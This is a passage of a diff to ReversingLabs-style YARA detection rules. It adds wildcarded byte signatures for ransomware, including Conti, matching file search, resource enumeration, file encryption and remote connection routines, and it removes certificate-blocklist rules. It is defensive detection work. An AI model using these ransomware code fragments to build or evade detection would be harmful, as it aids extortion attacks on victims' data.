?? 53 56 57 33 DB 68 ?? ?? ?? ?? 8D 75 + ?? 89 5D ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 + 53 53 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 6A + ?? 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? + ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 53 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? + ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 32 DB EB ?? B3 ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? + 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? + ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 8B 1D ?? ?? ?? ?? + 50 FF D3 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 + 72 ?? 8B 00 50 FF D3 33 DB 43 53 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? + E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 59 59 FF 75 ?? FF + } + $remote_connection_p2 = { + D6 FF 75 ?? FF D6 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? + 83 78 ?? ?? 59 59 72 ?? 8B 00 50 FF 15 ?? ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? + 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? + ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 C9 51 51 51 50 68 ?? ?? ?? ?? 51 FF 15 ?? + ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 5A 8B C1 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 39 55 ?? + 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? + 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 + 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D + ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 83 EC ?? 8D 45 ?? 8B F4 50 E8 ?? ?? + ?? ?? 83 EC ?? 8B F4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 33 + FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $enum_resources_p1 = { + 55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 53 56 57 FF 15 ?? ?? ?? + ?? 83 64 24 ?? ?? 89 44 24 ?? BB ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? D3 EA 33 C0 40 + 23 D0 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? 80 C1 ?? 5F 88 4C 24 ?? FF 74 24 ?? 8D + 74 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 64 24 ?? ?? 8B 74 24 ?? 53 89 + 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 59 03 C6 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D + 44 24 ?? 50 83 C8 ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8B C6 + E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8B C6 50 FF 15 ?? ?? ?? ?? 6A ?? 33 + FF 8D 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 + 8B F8 53 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? + 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 + 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 + } + $enum_resources_p2 = { + 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D + 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8D 44 24 + ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 + ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? + E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 6A ?? 8D 4C 24 ?? 51 8D + 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? 89 44 24 ?? 8D + 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? + 89 44 24 ?? 8D 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 2B 44 24 + ?? 8B 4C 24 ?? 1B 4C 24 ?? BE ?? ?? ?? ?? 0F AC C8 ?? 89 44 24 ?? 8D 44 24 ?? C1 E9 + ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? FF 44 24 ?? 83 7C 24 ?? ?? + 0F 8C ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_files_1_p1 = { + 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 + 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? + E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? + 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? + ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 + } + $find_files_1_p2 = { + C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 + ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? + ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? + ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? + ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? + ?? ?? 59 84 C0 75 ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? + FF 15 + } + $find_files_2_p1 = { + 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 + ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F + 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? + ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 + 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 8D + 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 FF D6 + 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 + } + $find_files_2_p2 = { + 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 + 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? + ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 4C + 24 ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? + ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 75 ?? 32 DB EB ?? B3 ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 + FF 8D 74 24 ?? E8 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 FF 8D 74 + } + $find_files_2_p3 = { + 24 ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? + ?? ?? 50 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 8B + 46 ?? 59 83 C9 ?? 2B C8 83 F9 ?? 0F 86 ?? ?? ?? ?? 8D 58 ?? 6A ?? 8B C6 E8 ?? ?? ?? + ?? 84 C0 74 ?? 83 7E ?? ?? 8B 4E ?? 72 ?? 8B 06 EB ?? 8B C6 6A ?? 5A 66 89 14 48 83 + 7E ?? ?? 89 5E ?? 72 ?? 8B 06 EB ?? 8B C6 33 C9 66 89 0C 58 8B DE 8D 74 24 ?? E8 ?? + ?? ?? ?? 8B DE 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF E8 ?? ?? ?? ?? 6A ?? 8D 74 24 + ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 + 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 44 24 ?? E8 + ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 59 6A ?? 33 FF 8D 74 24 ?? E8 + ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 8D 74 24 ?? E8 ?? ?? ?? ?? 8D + 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? + ?? ?? 59 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 + 8D 74 24 ?? E8 + } + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 33 F6 C7 43 ?? + ?? ?? ?? ?? 89 73 ?? C6 03 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 57 2B C1 6A ?? 99 5F + F7 FF 89 9D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 85 C0 74 ?? 89 B5 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 83 EC ?? 03 C1 8B F4 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A + ?? 50 83 C8 ?? 8B F3 E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? + ?? 8B 0D ?? ?? ?? ?? 2B C1 6A ?? 99 5E F7 FE FF 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? + 39 85 ?? ?? ?? ?? 72 ?? 8B 53 ?? 6A ?? 5F C6 85 ?? ?? ?? ?? ?? 3B D7 72 ?? 8B 0B EB + ?? 8B CB 8B 43 ?? 03 C1 3B D7 72 ?? 8B 0B EB ?? 8B CB 50 51 8D 85 ?? ?? ?? ?? 50 8D + 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 7B ?? 72 ?? 8B 03 EB ?? 8B C3 8B 5B ?? 8B + B5 ?? ?? ?? ?? 03 D8 53 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B + 4E ?? C6 85 ?? ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? + 8B 0E EB ?? 8B CE 50 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 39 7E ?? 72 ?? 8B 0E EB ?? 8B CE 8B 46 ?? 03 C1 50 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? + ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4E + } + $encrypt_files_p2 = { + 89 85 ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? 8B 0E EB + ?? 8B CE 3B C8 74 ?? 8B B5 ?? ?? ?? ?? 2B F1 8A 11 88 14 0E 41 3B C8 75 ?? 8D 45 ?? + 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 75 ?? 8B F8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 8D 45 ?? E8 ?? ?? ?? ?? 8B F0 8B 46 ?? 8B 56 ?? 59 59 8B 4F ?? 2B C2 3B C8 76 ?? + 8B 47 ?? 2B C1 3B C2 72 ?? 56 8B F7 E8 ?? ?? ?? ?? EB ?? 6A ?? 57 83 C8 ?? E8 ?? ?? + ?? ?? 8B D8 8D 75 ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 DB 53 68 ?? ?? ?? ?? 6A ?? 53 53 68 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 + ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 3B F3 74 ?? 53 53 53 56 + FF 15 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF + 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fan Li" and pe.signatures[i].serial=="62:1e:d8:26:5b:0a:d8:72:d9:f4:b4:ed:6d:56:05:13" and 1413183357<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_1_p*)) and ( all of ($find_files_2_p*)) and ( all of ($enum_resources_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_56E22B992B4C7F1Afeac1D63B492Bf54 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Conti : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Conti ransomware." author = "ReversingLabs" - id = "28609e75-47cb-5017-bb92-046a9e8931c6" - date = "2023-11-08" - modified = "2023-11-08" + id = "548b8836-83cb-560c-af5f-33bdb24d15ed" + date = "2020-12-14" + modified = "2020-12-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1672-L1688" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ef058c0ec352260fa3db0fc74331d1da3c9eb8d161cef7635632fd7c569198c6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Conti.yara#L1-L74" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4f2b96c8eaf8d112a7bb60647db49616935a336396c705d39d5bb51dfd90c60b" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Conti" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B D9 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? + 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 44 + 24 ?? B9 ?? ?? ?? ?? 53 BE ?? ?? ?? ?? 57 66 83 7C 43 ?? ?? 0F 45 F1 FF 15 ?? ?? ?? + ?? 56 57 FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? + 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B + CB E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B CE E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB ?? + 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B CB E8 ?? ?? ?? ?? 8B F0 85 F6 + 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 5A 8B C8 C6 01 ?? 41 + 83 EA ?? 75 ?? 83 48 ?? ?? 50 89 70 ?? A1 ?? ?? ?? ?? 52 6A ?? FF 70 ?? FF 15 ?? ?? + ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? E8 ?? + ?? ?? ?? 83 FF ?? 74 ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BB ?? ?? ?? ?? 8B F9 53 57 FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + A1 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 75 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? FF 74 B5 ?? 57 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 46 83 FE ?? 7C ?? 33 C0 40 EB ?? 85 C0 75 ?? 8B 35 ?? ?? ?? ?? BB ?? + ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 53 56 FF 15 ?? + ?? ?? ?? 85 C0 74 ?? 2B C6 D1 F8 74 ?? 85 C0 78 ?? 40 50 56 8D 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 56 FF 15 ?? + ?? ?? ?? 8B F0 85 F6 74 ?? 83 C6 ?? EB ?? 33 C0 5F 5E 5B C9 C3 + } + $encrypt_files_p2 = { + 55 8B EC 83 EC ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB 53 FF 15 ?? ?? + ?? ?? 8B F8 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 5E 56 68 ?? ?? ?? + ?? 53 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 + 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 + ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 ?? 50 + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 53 53 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A + ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? 85 C0 75 + ?? 6A ?? FF 15 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 4D ?? + 8B D7 FF 75 ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? + 8B 45 ?? B9 ?? ?? ?? ?? 83 48 ?? ?? 8B 45 ?? 8B 58 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 + ?? 53 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? + ?? 8B CE E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 49 ?? E8 ?? ?? ?? ?? FF + 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? FF + 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B C9 C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Hetem Ramadani" and pe.signatures[i].serial=="56:e2:2b:99:2b:4c:7f:1a:fe:ac:1d:63:b4:92:bf:54" and 1435622399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) } 